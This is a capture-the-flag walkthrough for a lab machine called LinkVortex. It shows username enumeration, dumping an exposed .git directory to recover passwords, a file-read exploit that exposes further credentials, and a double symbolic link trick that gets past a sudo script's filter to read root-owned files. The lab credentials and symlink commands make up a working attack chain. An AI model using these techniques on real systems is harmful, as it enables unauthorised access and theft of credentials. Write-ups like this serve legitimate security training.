User flag

We found a dev subdomain but it doesnt look helpful right away


Valid username found at http://linkvortex.htb/ghost/

If we enter an invalid login and click forgot password we get user not found


Valid login shows



Password spraying locks us out for an hour… so its safe to say this isnt the path.



Back to the dev subdomain we find a .git directory


We use gitdumper to dump the directory and find 2 passwords.

newPassword: 'thisissupersafe',

password = 'OctopiFociPilfer45';



This login works for the admin directory

[email protected]:OctopiFociPilfer45


With creds we can exploit this vulnerability



We find a file in the docker file



Using the exploit we can get the files contents which has a username and password

        "user": "[email protected]",
       "pass": "fibber-talented-worth"



Root flag


User bob may run the following commands on linkvortex:
   (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/ *.png

cat /opt/ghost/



if [ -z $CHECK_CONTENT ];then


if ! [[ "$LINK" =~ \.png$ ]]; then
 /usr/bin/echo "! First argument must be a png file !"
 exit 2

if /usr/bin/sudo /usr/bin/test -L $LINK;then
 LINK_NAME=$(/usr/bin/basename $LINK)
 LINK_TARGET=$(/usr/bin/readlink $LINK)
 if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
   /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
   /usr/bin/unlink $LINK
   /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
   /usr/bin/mv $LINK $QUAR_DIR/
   if $CHECK_CONTENT;then
     /usr/bin/echo "Content:"
     /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null



We can use a double symbolic link to exploit this. The script above looks for /etc or /root in the link so we cant use a single link directly.


We create one link on link1.txt and a second link on two.png pointing to link1.txt bypassing the filter


ln -s /root/root.txt link1.txt
ln -s /home/bob/link1.txt two.png
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/ /home/bob/two.png
Link found [ /home/bob/two.png ] , moving it to quarantine